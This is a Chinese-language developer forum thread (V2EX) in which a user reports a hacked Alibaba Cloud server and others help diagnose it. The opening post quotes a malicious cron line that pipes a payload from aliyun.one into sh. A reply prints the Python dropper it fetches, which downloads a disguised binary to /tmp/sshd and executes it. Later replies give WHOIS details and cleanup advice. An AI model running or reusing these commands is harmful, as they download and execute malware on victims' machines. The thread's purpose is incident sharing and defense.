我擦 阿里云服务器被黑了 aliyun.one

2019-12-05 15:37:44 +08:00
 liusong2770

多了一条删不掉的定时任务 */15 * * * * (curl -fsSL -m180 aliyun.one||wget -q -T180 -O- aliyun.one||python -c 'import urllib;exec(urllib.urlopen("http://aliyun.one/pygo").read())')|sh

11061 次点击
所在节点    程序员
36 条回复
asuraa
2019-12-05 15:43:19 +08:00
域名
aliyun.one 反查该域名

注册商 tucows domains inc.
注册人
redacted for privacy 反查该注册人

注册人单位
redacted for privacy 反查该注册人单位

注册人邮箱
https://tieredaccess.com/contact/b6525cdd-eb09-4a5c-a7ce-d6408ac9bafb 反查该邮箱

注册时间 2019-11-18
过期时间 2020-11-18
更新时间 2019-12-02
域名状态
clientupdateprohibited

clienttransferprohibited

DNS 服务器
elle.ns.cloudflare.com

dane.ns.cloudflare.com

不是阿里云的
shinodajmk
2019-12-05 15:44:48 +08:00
最近爆发了多起同样的,都是肉鸡复肉鸡
opengps
2019-12-05 15:45:57 +08:00
最近刚有人也是发了这个域名 /t/624351
怀疑是定向针对阿里云的冒充阿里云挖矿的
kuro1
2019-12-05 15:48:44 +08:00
redis?
simenet
2019-12-05 15:55:15 +08:00
redis 没有密码导致的
imagecap
2019-12-05 17:03:26 +08:00
先用 hosts, 把域名指向 0.0.0.0
claymore94
2019-12-05 17:24:21 +08:00
这个域名拿下来文件的内容:
```python
import urllib
import platform
import os

if platform.architecture()[0] == "64bit":
urlx64 = 'http://img.sobot.com/chatres/89/msg/20191204/1/072b8fe887bc448c9b9aca89635e83eb.png'
urlx642 = 'http://lsdu.b-cdn.net/x64'
try:
f = urllib.urlopen(urlx64)
if f.code == 200:
data = f.read()
with open("/tmp/sshd", "wb") as code:
code.write(data)
else:
f2 = urllib.urlopen(urlx642)
data2 = f2.read()
with open("/tmp/sshd", "wb") as code2:
code2.write(data2)
os.chmod("/tmp/sshd", 0o777)
os.system("/tmp/sshd")
except:
pass
else:
urlx32 = 'http://img.sobot.com/chatres/89/msg/20191204/1/5b913b1345e74e8996e21f22f3e1e83c.png'
urlx322 = 'http://lsdu.b-cdn.net/x32'
try:
f = urllib.urlopen(urlx32)
if f.code == 200:
data = f.read()
with open("/tmp/sshd", "wb") as code:
code.write(data)
else:
f2 = urllib.urlopen(urlx322)
data2 = f2.read()
with open("/tmp/sshd", "wb") as code2:
code2.write(data2)
os.chmod("/tmp/sshd", 0o777)
os.system("/tmp/sshd")
except:
pass
```

可以删掉 /tmp/sshd, 建个 /tmp/sshd 文件夹让它写不了 先应付着
claymore94
2019-12-05 17:26:16 +08:00
``` python

print("代码块测试")

```
markdown 代码块测试
Wao
2019-12-05 17:42:47 +08:00
当访问这个页面时
![批注 2019-12-05 174153.png]( https://i.loli.net/2019/12/05/XKznJj3bxkt1hfo.png)
killerzhangsan
2019-12-05 20:06:57 +08:00
上周六同被黑,查了一天,进程被隐藏了看不到 pid,找不到病毒文件在哪里,常用命令被污染。后面恢复快照了事。现在还有一个病毒快照在
wooyuntest
2019-12-05 21:16:38 +08:00
@killerzhangsan @liusong2770 二位已经查到了黑客怎么打进来的吗?
MonoLogueChi
2019-12-05 21:28:54 +08:00
今天我同事的服务器也被黑了,被人改了主页
jhsea3do
2019-12-06 01:15:30 +08:00
肉鸡?
SharkIng
2019-12-06 03:01:40 +08:00
怎么打进来的不知道,怎么解决可以考虑试试

cron 肯定不存在删不掉的情况,唯一的可能就是有其他运行的程序不断的生成 cron 内容,甚至更新 URL 地址

- 查看 ps aux 看看有没有什么其他跑得程序。cron 上只是一个 curl 一个 wget 一个 python,15 分钟运行一次,如果 ps 有别的不应该运行的程序的话那估计就是它了
- 查看其他 cron 的地方,cron 有很多不同地方设置 /etc/cron.d/ /etc/cron.daily 等,还有 crontab -l 都看一遍
- 我印象中处理过一个类似情况,是被下了一个 lib 文件,具体叫什么在哪忘了,但是那个 lib 文件会不断的生成新的 cron 原理和你这个差不多,可以试着搜一下 Google。然后查看下所有可能的地方 /var /etc /opt /usr 等文件夹下面所有文件夹。那个东西可能会为装成某一个程序或者库,但是也相对很容易辨认
Andy1999
2019-12-06 03:11:26 +08:00
所以说阿里云盾就是个摆设
ZavierXu
2019-12-06 08:40:04 +08:00
@SharkIng 这种如果带 rootkit 的话没办法通过 ps/netstat/lsof 等看到进程及文件信息的,建议直接恢复快照了事……
durban126
2019-12-06 08:52:41 +08:00
真心不敢用阿里云了
mytsing520
2019-12-06 08:52:51 +08:00
牛逼,发现问题后,直接改了代码,直接跳转到 www.aliyun.com ,再把后面的脚本全部注释
passerbytiny
2019-12-06 08:56:09 +08:00
“我擦,我在阿里云的服务器被黑了,有个脚本访问 aliyun.one”——标题更正。
scukmh
2019-12-06 08:57:21 +08:00
这难道不是你们自己的服务器问题吗?服气,阿里是把你的服务器密码公开了还是怎么了。做好安全防护,这难道不是开发应有的基本意识吗? redis,mysql,mongodb 数据库不设密码或密码简单暴露在公网上,人家不打你打谁?

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/626230

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX